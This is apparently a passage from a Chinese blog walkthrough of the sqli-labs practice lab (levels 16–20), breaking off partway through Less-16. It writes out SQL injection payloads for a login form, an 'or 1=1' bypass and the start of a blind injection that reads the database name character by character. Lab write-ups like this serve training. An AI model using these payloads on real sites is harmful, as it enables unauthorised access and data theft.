sqli-labs(Less-16——Less-20)解題過程

Less-16 先嚐試輸入admn,顯示登陸成功,可是沒有返回信息,又而後嘗試輸入:uname=admin") or 1=1#&passwd=admin&submit=Submit,回顯成功,一樣也沒有返回信息,與15題的作法相同,使用盲注 爆數據庫名:uname=1") or (select ascii(substr(database(),1,1)) >110)#&passwd=admin&su
相關文章
相關標籤/搜索